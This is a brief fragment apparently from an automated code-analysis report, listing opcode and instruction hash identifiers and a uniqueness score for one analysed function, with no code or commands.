            • API String ID: 74227042-0
            • Opcode ID: 9c99baa2e023fc1b10bed6eea3d67a926d8a490be52cd7006b708c5f20bf5040
            • Instruction ID: 3e0b275469be210bb8b11bf0f360fd9d03c790c4cc9a1acb8ab82ebbdc57c135
            • Opcode Fuzzy Hash: 9c99baa2e023fc1b10bed6eea3d67a926d8a490be52cd7006b708c5f20bf5040
            • Instruction Fuzzy Hash: 87E092735036A1AB8711ABA9AC8CC6FBBACFF8D660304441AF700D7110D739D901CBA9
            Uniqueness

            Uniqueness Score: -1.00%